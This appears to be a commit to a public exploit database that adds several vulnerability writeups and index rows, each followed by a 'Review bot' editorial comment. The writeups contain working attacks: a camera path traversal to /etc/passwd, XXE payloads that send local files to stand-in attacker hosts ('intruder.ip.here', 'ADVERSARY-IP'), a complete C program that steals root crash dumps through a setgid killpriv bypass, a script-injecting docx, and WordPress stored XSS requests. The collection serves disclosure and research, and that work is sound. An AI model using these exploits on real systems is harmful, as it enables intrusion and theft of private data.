DB: 2018-07-17

7 changes to exploits/shellcodes

macOS/iOS - JavaScript Injection Bug in OfficeImporter
Linux/Ubuntu - Other Users coredumps can be read via setgid Directory and killpriv Bypass

Microsoft Enterprise Mode Site List Manager - XML External Entity Injection

Hadoop YARN ResourceManager - Unauthenticated Command Execution (Metasploit)
Hadoop YARN ResourceManager - Command Execution (Metasploit)

VelotiSmart WiFi B-380 Camera - Directory Traversal
Fortify Software Security Center (SSC) 17.x/18.1 - XML External Entity Injection
WordPress Plugin Job Manager 4.1.0 - Cross-Site Scripting

Linux/ARM - Bind (1234/TCP) Shell (/bin/sh) Shellcode (104 bytes)
Offensive Security 2018-07-17 05:01:49 +00:00
parent b374aca9a3
commit a657b64301
9 changed files with 806 additions and 1 deletions


@ -0,0 +1,22 @@
Title: Vulnerability in VelotiSmart Wifi - Directory Traversal
Date: 12-07-2018
Scope: Directory Traversal
Platforms: Unix
Author: Miguel Mendez Z
Vendor: VelotiSmart
Version: B380
CVE: CVE-201814064
Vulnerability description
-------------------------
- The vulnerability that affects the device is LFI type in the uc-http service 1.0.0. What allows to obtain information of configurations, wireless scanned networks, sensitive directories, etc. Of the device.
Vulnerable variable:
http://domain:80/../../etc/passwd
Exploit link:
https://github.com/s1kr10s/ExploitVelotiSmart
Poc:
https://medium.com/@s1kr10s/velotismart-0day-ca5056bcdcac
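Review bot: the `CVE: CVE-201814064` line is missing the hyphen between the year and the sequence number; CVE identifiers have the form CVE-YYYY-NNNNN, so this should read `CVE-2018-14064` (please confirm against the MITRE entry, since the 45030 row in files_exploits.csv carries no CVE at all). The `Date: 12-07-2018` field is day-month-year while the rest of the repository uses ISO dates; suggest `2018-07-12`. Minor wording: "What allows to obtain information of configurations ... Of the device." would read better as a single sentence, e.g. "which allows an attacker to read device configuration, the list of scanned wireless networks and other sensitive directories."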


@ -0,0 +1,208 @@
Details
================
Software: Fortify SSC (Software Security Center)
Version: 17.10, 17.20 & 18.10
Homepage: https://www.microfocus.com
Advisory report: https://github.com/alt3kx/CVE-2018-12463
CVE: CVE-2018-12463 at https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12463
CVSS: HIGH (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)
CWE-611, CWE-918
Description
================
Out-of-Band XML External Entity (OOB-XXE) An XML External Entity attack is a type of attack against an application that parses XML input.
This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of
confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.
Vulnerability
================
XML external entity (XXE) vulnerability in /ssc/fm-ws/services in Fortify Software Security Center (SSC) 17.10, 17.20 & 18.10 allows remote unauthenticated users to read arbitrary
files or conduct server-side request forgery (SSRF) attacks via a crafted DTD in an XML request.
Proof of concept Exploit
==========================
The offending POST method below:
POST /ssc/fm-ws/services HTTP/1.1
Accept-Encoding: gzip, deflate
SOAPAction: ""
Accept: text/xml
Content-Type: text/xml; charset=UTF-8; text/html;
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Java/1.8.0_121
Host: fortifyserver.com
Connection: close
Content-Length: 1765
<?xml version='1.0' encoding='UTF-8'?>
<!Your payload here "http://intuder.IP.here/alex1.dtd"> <-- HERE!!!
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<wsse:Security xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" soapenv:mustUnderstand="1">
<wsu:Timestamp xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd" wsu:Id="Timestamp-2">
<wsu:Created>2018-05-24T14:27:02.619Z</wsu:Created>
<wsu:Expires>2018-05-24T14:32:02.619Z</wsu:Expires>
</wsu:Timestamp>
<wsse:UsernameToken xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd" wsu:Id="UsernameToken-1">
<wsse:Username>XXXXXXX</wsse:Username>
<wsse:Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordText">XXXXXXXXXXX</wsse:Password>
</wsse:UsernameToken>
</wsse:Security>
</soapenv:Header>
<soapenv:Body>
<ns3:GetAuthenticationTokenRequest xmlns:ns3="http://www.fortify.com/schema/fws" xmlns:ns6="xmlns://www.fortify.com/schema/issuemanagement"
xmlns:ns5="xmlns://www.fortifysoftware.com/schema/activitytemplate" xmlns:ns8="xmlns://www.fortifysoftware.com/schema/seed"
xmlns:ns7="xmlns://www.fortifysoftware.com/schema/runtime"
xmlns:ns9="xmlns://www.fortify.com/schema/attachments"
xmlns:ns2="xmlns://www.fortify.com/schema/audit"
xmlns:ns4="xmlns://www.fortifysoftware.com/schema/wsTypes"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<ns3:TokenType>AnalysisUploadToken</ns3:TokenType>
</ns3:GetAuthenticationTokenRequest>
</soapenv:Body>
</soapenv:Envelope>
Note: As remark that is not necessary to be used the credentials or any authentication, the POST method above was extracted using Burp Suite to know the
exact API path and data sending to the server.
RedTeam Vector (1): Using “Transitional” payload, connection to HTTP server (intruder). it works!
POST /ssc/fm-ws/services HTTP/1.1
Accept-Encoding: gzip, deflate
SOAPAction: ""
Accept: text/xml
Content-Type: text/xml; charset=UTF-8; text/html;
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Java/1.8.0_121
Host: fortifyserver.com
Connection: close
Content-Length: 1789
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://intruder.ip.here/alex1.dtd">
[../snip]
RedTeam Vector (2): Classic "OOB XXE" payload, connection to HTTP server (intruder), it works!
POST /ssc/fm-ws/services HTTP/1.1
Accept-Encoding: gzip, deflate
SOAPAction: ""
Accept: text/xml
Content-Type: text/xml; charset=UTF-8
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Java/1.8.0_121
Host: fortifyserver.com
Connection: close
Content-Length: 1750
<?xml version='1.0' encoding='UTF-8'?>
<!DOCTYPE data SYSTEM "http://intruder.ip.here/alex1.dtd">
<data>&send;</data>
[../snip]
RedTeam Vector (3): FTP payload with ruby FTP server emulator
POST /ssc/fm-ws/services HTTP/1.1
Accept-Encoding: gzip, deflate
SOAPAction: ""
Accept: text/xml
Content-Type: text/xml; charset=UTF-8
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Java/1.8.0_121
Host: fortifyserver.com
Connection: close
Content-Length: 1769
<?xml version='1.0' encoding='UTF-8'?>
<!DOCTYPE data SYSTEM "ftp://intruder.ip.here:2121">
[../snip]
RedTeam Vector (4): FTP payloads with FTP python server
POST /ssc/fm-ws/services HTTP/1.1
Accept-Encoding: gzip, deflate
SOAPAction: ""
Accept: text/xml
Content-Type: text/xml; charset=UTF-8
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Java/1.8.0_121
Host: fortifyserver.com
Connection: close
Content-Length: 1769
<?xml version='1.0' encoding='UTF-8'?>
<!DOCTYPE data SYSTEM "ftp://intruder.ip.here:2121">
[../snip]
RedTeam Vector (5): FTP payload, server compromised
POST /ssc/fm-ws/services HTTP/1.1
Accept-Encoding: gzip, deflate
SOAPAction: ""
Accept: text/xml
Content-Type: text/xml; charset=UTF-8
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Java/1.8.0_121
Host: fortifyserver.com
Connection: close
Content-Length: 1769
<?xml version='1.0' encoding='UTF-8'?>
<!DOCTYPE data SYSTEM "ftp://anonymous:anonymous@intruder.ip.here:2121/alex1.txt">
[../snip]
Mitigations
================
Provided by the vendor here:
Document ID: KM03201563
https://softwaresupport.softwaregrp.com/document/-/facetsearch/document/KM03201563
Disclosure policy
================
We believes in responsible disclosure.
Please contact us on Alex Hernandez aka alt3kx () protonmail com to acknowledge this report.
This vulnerability will be published if we do not receive a response to this report with 10 days.
Timeline
================
2018-05-24: Discovered
2018-05-25: Retest PRO environment
2018-05-31: Vendor notification, two issues found
2018-05-31: Vendor feedback received
2018-06-01: Internal communication
2018-06-01: Vendor feedback, two issues are confirmed
2018-06-05: Vendor notification, new issue found
2018-06-06: Vendor feedback, evaluating High submission
2018-06-08: Vendor feedback, High issue is confirmed
2018-06-19: Researcher, reminder sent
2018-06-22: Vendor feedback, summary of CVEs handled as official way
2018-06-26: Vendor feedback, official Hotfix for High issue available to test
2018-06-29: Researcher feedback
2018-07-02: Researcher feedback
2018-07-04: Researcher feedback, Hotfix tested on QA environment
2018-07-05: Vendor feedback
2018-07-09: Vendor feedback, final details to disclosure the CVE and official Hotfix availabe for customers.
2018-07-09: Vendor feedback, CVE and official Hotfix to be disclosure
2018-07-12: Agreements with the vendor to publish the CVE/Advisory.
2018-07-12: Public report
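Review bot: the line `<!Your payload here "http://intuder.IP.here/alex1.dtd"> <-- HERE!!!` in the first request is a placeholder, not well-formed XML, so that request body will not parse as pasted; vectors (1) and (2) give the real `<!DOCTYPE ...>` forms, so replace the placeholder with an XML comment (e.g. `<!-- external DOCTYPE declaration goes here -->`) to keep the listing valid, and fix "intuder" to "intruder" to match the later vectors. The header `Content-Type: text/xml; charset=UTF-8; text/html;` in the first two requests is malformed (two media types in one value); the later vectors use the correct `text/xml; charset=UTF-8`. The `CVSS:` line gives a CVSS v3 vector without the `CVSS:3.0/` prefix or the numeric score; adding both avoids ambiguity. Spelling in the closing sections: "We believes" -> "We believe", "with 10 days" -> "within 10 days", "availabe" -> "available", "final details to disclosure the CVE" -> "final details to disclose the CVE", "to be disclosure" -> "to be disclosed".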

exploits/linux/dos/45033.c Normal file

@ -0,0 +1,177 @@
/*
Note: I am both sending this bug report to security@kernel.org and filing it in
the Ubuntu bugtracker because I can't tell whether this counts as a kernel bug
or as a Ubuntu bug. You may wish to talk to each other to determine the best
place to fix this.
I noticed halfdog's old writeup at
https://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/
, describing essentially the following behavior in combination with a
trick for then writing to the resulting file without triggering the
killpriv logic:
=============
user@debian:~/sgid_demo$ sudo mkdir -m03777 dir
user@debian:~/sgid_demo$ cat > demo.c
#include <fcntl.h>
int main(void) { open("dir/file", O_RDONLY|O_CREAT, 02755); }
user@debian:~/sgid_demo$ gcc -o demo demo.c
user@debian:~/sgid_demo$ ./demo
user@debian:~/sgid_demo$ ls -l dir/file
-rwxr-sr-x 1 user root 0 Jun 25 22:03 dir/file
=============
Two patches for this were proposed on LKML back then:
"[PATCH 1/2] fs: Check f_cred instead of current's creds in
should_remove_suid()"
https://lore.kernel.org/lkml/9318903980969a0e378dab2de4d803397adcd3cc.1485377903.git.luto@kernel.org/
"[PATCH 2/2] fs: Harden against open(..., O_CREAT, 02777) in a setgid directory"
https://lore.kernel.org/lkml/826ec4aab64ec304944098d15209f8c1ae65bb29.1485377903.git.luto@kernel.org/
However, as far as I can tell, neither of them actually landed.
You can also bypass the killpriv logic with fallocate() and mmap() -
fallocate() permits resizing the file without triggering killpriv,
mmap() permits writing without triggering killpriv (the mmap part is mentioned
at
https://lore.kernel.org/lkml/CAGXu5jLu6OGkQUgqRcOyQ6DABOwZ9HX3fUQ+-zC7NjLukGKnVw@mail.gmail.com/
):
=============
user@debian:~/sgid_demo$ sudo mkdir -m03777 dir
user@debian:~/sgid_demo$ cat fallocate.c
#define _GNU_SOURCE
#include <stdlib.h>
#include <fcntl.h>
#include <err.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>
#include <string.h>
int main(void) {
int src_fd = open("/usr/bin/id", O_RDONLY);
if (src_fd == -1)
err(1, "open 2");
struct stat src_stat;
if (fstat(src_fd, &src_stat))
err(1, "fstat");
int src_len = src_stat.st_size;
char *src_mapping = mmap(NULL, src_len, PROT_READ, MAP_PRIVATE, src_fd, 0);
if (src_mapping == MAP_FAILED)
err(1, "mmap 2");
int fd = open("dir/file", O_RDWR|O_CREAT|O_EXCL, 02755);
if (fd == -1)
err(1, "open");
if (fallocate(fd, 0, 0, src_len))
err(1, "fallocate");
char *mapping = mmap(NULL, src_len, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
if (mapping == MAP_FAILED)
err(1, "mmap");
memcpy(mapping, src_mapping, src_len);
munmap(mapping, src_len);
close(fd);
close(src_fd);
execl("./dir/file", "id", NULL);
err(1, "execl");
}
user@debian:~/sgid_demo$ gcc -o fallocate fallocate.c
user@debian:~/sgid_demo$ ./fallocate
uid=1000(user) gid=1000(user) egid=0(root)
groups=0(root),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(lpadmin),116(scanner),121(wireshark),1000(user)
=============
sys_copy_file_range() also looks as if it bypasses killpriv on
supported filesystems, but I haven't tested that one so far.
On Ubuntu 18.04 (bionic), /var/crash is mode 03777, group "whoopsie", and
contains group-readable crashdumps in some custom format, so you can use this
issue to steal other users' crashdumps:
=============
user@ubuntu-18-04-vm:~$ ls -l /var/crash
total 296
-rw-r----- 1 user whoopsie 16527 Jun 25 22:27 _usr_bin_apport-unpack.1000.crash
-rw-r----- 1 root whoopsie 50706 Jun 25 21:51 _usr_bin_id.0.crash
-rw-r----- 1 user whoopsie 51842 Jun 25 21:42 _usr_bin_id.1000.crash
-rw-r----- 1 user whoopsie 152095 Jun 25 21:43 _usr_bin_strace.1000.crash
-rw-r----- 1 root whoopsie 18765 Jun 26 00:42 _usr_bin_xattr.0.crash
user@ubuntu-18-04-vm:~$ cat /var/crash/_usr_bin_id.0.crash
cat: /var/crash/_usr_bin_id.0.crash: Permission denied
user@ubuntu-18-04-vm:~$ cat fallocate.c
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <err.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>
#include <string.h>
int main(int argc, char **argv) {
if (argc != 2) {
printf("usage: ./fallocate <file_to_read>");
return 1;
}
int src_fd = open("/bin/cat", O_RDONLY);
if (src_fd == -1)
err(1, "open 2");
struct stat src_stat;
if (fstat(src_fd, &src_stat))
err(1, "fstat");
int src_len = src_stat.st_size;
char *src_mapping = mmap(NULL, src_len, PROT_READ, MAP_PRIVATE, src_fd, 0);
if (src_mapping == MAP_FAILED)
err(1, "mmap 2");
unlink("/var/crash/privileged_cat"); /* in case we've already run before */
int fd = open("/var/crash/privileged_cat", O_RDWR|O_CREAT|O_EXCL, 02755);
if (fd == -1)
err(1, "open");
if (fallocate(fd, 0, 0, src_len))
err(1, "fallocate");
char *mapping = mmap(NULL, src_len, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
if (mapping == MAP_FAILED)
err(1, "mmap");
memcpy(mapping, src_mapping, src_len);
munmap(mapping, src_len);
close(fd);
execl("/var/crash/privileged_cat", "cat", argv[1], NULL);
err(1, "execl");
}
/*
user@ubuntu-18-04-vm:~$ gcc -o fallocate fallocate.c
user@ubuntu-18-04-vm:~$ ./fallocate /var/crash/_usr_bin_id.0.crash > /var/crash/_usr_bin_id.0.crash.stolen
user@ubuntu-18-04-vm:~$ ls -l /var/crash
total 384
-rwxr-sr-x 1 user whoopsie 35064 Jul 3 19:22 privileged_cat
-rw-r----- 1 user whoopsie 16527 Jun 25 22:27 _usr_bin_apport-unpack.1000.crash
-rw-r----- 1 root whoopsie 50706 Jun 25 21:51 _usr_bin_id.0.crash
-rw-r--r-- 1 user whoopsie 50706 Jul 3 19:22 _usr_bin_id.0.crash.stolen
-rw-r----- 1 user whoopsie 51842 Jun 25 21:42 _usr_bin_id.1000.crash
-rw-r----- 1 user whoopsie 152095 Jun 25 21:43 _usr_bin_strace.1000.crash
-rw-r----- 1 root whoopsie 18765 Jun 26 00:42 _usr_bin_xattr.0.crash
user@ubuntu-18-04-vm:~$ mkdir root_crash_unpacked
user@ubuntu-18-04-vm:~$ # work around bug in apport-unpack
user@ubuntu-18-04-vm:~$ sed -i 's|^UserGroups: $|UserGroups: 0|' /var/crash/_usr_bin_id.0.crash.stolen
user@ubuntu-18-04-vm:~$ apport-unpack /var/crash/_usr_bin_id.0.crash.stolen root_crash_unpacked/
user@ubuntu-18-04-vm:~$ file root_crash_unpacked/CoreDump
root_crash_unpacked/CoreDump: ELF 64-bit LSB core file x86-64, version 1 (SYSV), SVR4-style, from 'id', real uid: 0, effective uid: 0, real gid: 0, effective gid: 0, execfn: '/usr/bin/id', platform: 'x86_64'
*/
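Review bot: `int src_len = src_stat.st_size;` narrows `off_t` to `int`; harmless for the small binaries copied here (`/usr/bin/id`, `/bin/cat`), but `off_t` (or `size_t` for the `mmap`/`memcpy` lengths) is the right type and costs nothing. The usage message `printf("usage: ./fallocate <file_to_read>");` lacks a trailing `\n`, so the shell prompt lands on the same line. The first listing closes `src_fd` before `execl` while the second drops that `close`; neither matters after a successful exec, but the two copies should agree. For readers on the defensive side, the report already names the two relevant fixes: the `/var/crash` directory being mode 03777 (world-writable plus setgid) is what turns a killpriv bypass into cross-user crash-dump disclosure, and the two linked LKML patches (`should_remove_suid()` checking `f_cred`, and hardening `open(..., O_CREAT, 02777)` in setgid directories) are the kernel-side remedy that the author notes never landed; it would help to state in the header which of the two (directory mode or kernel patch) the Ubuntu report asked for.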


@ -0,0 +1,18 @@
QuickLook is a widely used feature in macOS/iOS which allows you to preview various formats such as pdf, docx, pptx, etc. The way it uses to show office files is quite interesting. First it parses the office file and converts it to HTML code using OfficeImport and renders it using WebKit. The problem is, it doesn't filter the names of fonts when generating HTML code from them. We can abuse it to inject arbitrary JavaScript code. Namely, we can execute arbitrary JavaScript code via an office file.
OfficeImport is located at /System/Library/PrivateFrameworks/OfficeImport.framework/Versions/A/OfficeImport.
I attached a PoC that will just print out "location.href". You can test it by "Right click -> Quick Look" on macOS or just opening the PoC file on iOS.
Here's the document.xml file of the PoC file where I injected JavaScript code.
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:document xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:sl="http://schemas.openxmlformats.org/schemaLibrary/2006/main" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture" xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:lc="http://schemas.openxmlformats.org/drawingml/2006/lockedCanvas" xmlns:dgm="http://schemas.openxmlformats.org/drawingml/2006/diagram" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml"><w:body><w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000000"><w:pPr><w:contextualSpacing w:val="0"/><w:jc w:val="center"/><w:rPr><w:rFonts w:ascii="Trebuchet MS" w:cs="Trebuchet MS" w:eastAsia="Trebuchet MS" w:hAnsi="Trebuchet MS"/></w:rPr></w:pPr><w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000"><w:rPr><w:rtl w:val="0"/></w:rPr><w:t xml:space="preserve">asdfasdfasdfasdfs</w:t></w:r><w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000"><w:rPr><w:rFonts w:ascii="Trebuchet MS'</style><script>
document.write(location.href);
</script>" w:cs="Trebuchet MS" w:eastAsia="Trebuchet MS" w:hAnsi="Trebuchet MS"/><w:rtl w:val="0"/></w:rPr><w:t xml:space="preserve">asdfadfasadfas</w:t></w:r></w:p><w:sectPr><w:pgSz w:h="15840" w:w="12240"/><w:pgMar w:bottom="1440" w:top="1440" w:left="1440" w:right="1440" w:header="0"/><w:pgNumType w:start="1"/></w:sectPr></w:body></w:document>
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/45032.zip
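Review bot: the listing shows the injection point only implicitly: the `w:ascii` attribute value `Trebuchet MS'</style><script>` first closes the single-quoted font-family string inside the `<style>` block that OfficeImport generates, then closes the style element itself, which is why an unescaped font name becomes script; a sentence saying so next to the XML would save readers from hunting through the one-line document. The mitigation is also worth stating beside the PoC: a font name copied from the document must be CSS-string-escaped (and HTML-escaped) before it is written into the generated HTML, or rejected outright if it contains quotes or angle brackets. Finally, the XML is pasted as one very long line with a literal newline inside the attribute value; that is still valid XML, but noting that this is the `word/document.xml` entry inside the .docx zip would help readers locate it (the PoC zip link is the only other hint).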


@ -0,0 +1,102 @@
# Exploit Title: Wordpress Plugin Job Manager v4.1.0 Stored Cross Site
Scripting
# Google Dork: N/A
# Date: 2018-07-15
# Exploit Author: Berk Dusunur & Selimcan Ozdemir
# Vendor Homepage: https://wpjobmanager.com
# Software Link: https://downloads.wordpress.org/plugin/wp-job-manager.latest-stable.zip
# Affected Version: v4.1.0
# Tested on: Parrot OS / WinApp Server
# CVE : N/A
# Proof Of Concept
POST
/post-a-job/?step=%00foymtv%22%20method=%22post%22%20id=%22submit-job-form%22%20class=%22job-manager-form%22%20enctype=%22multipart/form-data%22%3E%3Cscript%3Ealert(%271%27)%3C/script%3E%3Cform%20action=%22/post-a-job/?step=%00foymtv
HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:59.0) Gecko/20100101
Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
https://target/post-a-job/?step=%00foymtv22%20method=%22post%22%20id=%22submit-job-form%22%20class=%22job-manager-form%22%20enctype=%22multipart/form-data%22%3E%3Cscript%3Ealert(%271%27)%3C/script%3E%3Cform%20action=%22/post-a-job/?step=%00foymtv
Content-Type: multipart/form-data;
boundary=---------------------------3756777582569023921817540904
Content-Length: 2379
Cookie: wp-job-manager-submitting-job-id=88664;
wp-job-manager-submitting-job-key=5ae8875580aff
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="job_title"
teertert</p></body><script>alert('1')</script>
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="job_description"
test</p></div></div><form input=""><p></p><script>alert('1')</script><a
href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">test</a>
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="job_region"
184
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="job_type"
2
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="application"
www.google.com
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="job_location"
Adelaide, Australia
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="company_name"
teertert</p></body><script>alert('1')</script>
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="company_tagline"
teertert</p></body><script>alert('1')</script>
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="company_website"
www.google.com
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="company_logo"; filename=""
Content-Type: application/octet-stream
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="company_poster_name"
teertert</p></body><script>alert('1')</script>
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="company_poster_email"
xssiletarihyazilmaz@gmail.com
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="job_manager_form"
submit-job
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="job_id"
0
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="step"
-----------------------------3756777582569023921817540904
Content-Disposition: form-data; name="submit_job"
Preview
-----------------------------3756777582569023921817540904--
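Review bot: the request has been hard-wrapped by the mailer and will not replay as pasted: the title runs onto a second line ("Stored Cross Site" / "Scripting"), the request line is split across `POST`, the path and `HTTP/1.1`, and both `User-Agent:` and `Referer:` are broken across lines; each needs to be rejoined on one line, and `Content-Length: 2379` should then be re-checked against the body. The `step` value in the Referer (`%00foymtv22%20method=...`) differs from the one in the request line (`%00foymtv%22%20method=...`), so one of the two is mistyped (the request line's `%22` is the one that closes the attribute). The title says "Stored Cross Site Scripting", but the `step` parameter payload in the URL is reflected into the form tag, while the form fields (`job_title`, `job_description`, `company_name`, `company_tagline`, `company_poster_name`) are the stored sinks; saying which sink the title refers to would make the finding easier to triage.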


@ -0,0 +1,92 @@
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-ENTERPRISE-MODE-SITE-LIST-MANAGER-XXE.txt
[+] ISR: Apparition Security
***Greetz: indoushka | Eduardo***
Vendor
=============
www.microsoft
Product
===========
Enterprise Mode Site List Manager
versions(1/2)
You can use IE11 and the Enterprise Mode Site List Manager to add individual website domains and domain paths
and to specify whether the site renders using Enterprise Mode or the default mode.
Vulnerability Type
===================
XML External Entity Injection
CVE Reference
==============
N/A
Security Issue
================
Versions 1 and 2 of Microsoft Enterprise Mode Site List Manager allow local file exfiltration to a remote attacker controlled server, if the user is tricked
into using an attacker supplied ".emie" site list manager file type.
Exploit/POC
=============
1) python -m SimpleHTTPServer
2) POC.emie
<?xml version="1.0"?>
<!DOCTYPE roottag [
<!ENTITY % file SYSTEM "c:\Windows\msdfmap.ini">
<!ENTITY % dtd SYSTEM "http://ADVERSARY-IP:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
3) payload.dtd
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://ADVERSARY-IP:8000?%file;'>">
%all;
Import the POC.emie into Enterprise Mode Site List Manager, then remote attackers will recieve local user files... nice.
Network Access
===============
Remote
Severity
=========
High
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
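Review bot: "recieve" in the import step should be "receive", and the `Vendor` field `www.microsoft` is truncated (no top-level domain). `Network Access` says "Remote" while the CSV row files this as `local,windows`; since the issue requires a user to import an attacker-supplied `.emie` file, `local` is the right classification and the line should say so (with a remark that the exfiltration target is a remote server) to avoid the contradiction. The advisory gives no mitigation; for this class (CWE-611) the standard fix is to parse the `.emie` file with DTD processing disabled and no external resolver, which on a .NET `XmlReader` means `XmlReaderSettings.DtdProcessing = DtdProcessing.Prohibit` and `XmlResolver = null` (assuming the tool uses the .NET XML stack; the advisory does not say), and that is worth recording for readers even though the vendor had not responded.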


@ -6017,6 +6017,8 @@ id,file,description,date,author,type,platform,port
45012,exploits/windows/dos/45012.js,"Microsoft Edge Chakra JIT - BoundFunction::NewInstance Out-of-Bounds Read",2018-07-12,"Google Security Research",dos,windows,
45013,exploits/windows/dos/45013.js,"Microsoft Edge Chakra JIT - Type Confusion with Hoisted SetConcatStrMultiItemBE Instructions",2018-07-12,"Google Security Research",dos,windows,
45017,exploits/windows/dos/45017.html,"G DATA Total Security 25.4.0.3 - Activex Buffer Overflow",2018-07-13,"Filipe Xavier Oliveira",dos,windows,
45032,exploits/multiple/dos/45032.txt,"macOS/iOS - JavaScript Injection Bug in OfficeImporter",2018-07-16,"Google Security Research",dos,multiple,
45033,exploits/linux/dos/45033.c,"Linux/Ubuntu - Other Users coredumps can be read via setgid Directory and killpriv Bypass",2018-07-16,"Google Security Research",dos,linux,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -9814,6 +9816,7 @@ id,file,description,date,author,type,platform,port
44989,exploits/windows/local/44989.py,"Boxoft WAV to WMA Converter 1.0 - Local Buffer Overflow (SEH)",2018-07-09,Achilles,local,windows,
45010,exploits/linux/local/45010.c,"Linux Kernel < 4.13.9 (Ubuntu 16.04/Fedora 27) - Local Privilege Escalation",2018-07-10,rlarabee,local,linux,
45024,exploits/windows/local/45024.rb,"Microsoft Windows - POP/MOV SS Local Privilege Elevation (Metasploit)",2018-07-13,Metasploit,local,windows,
45026,exploits/windows/local/45026.txt,"Microsoft Enterprise Mode Site List Manager - XML External Entity Injection",2018-07-16,hyp3rlinx,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
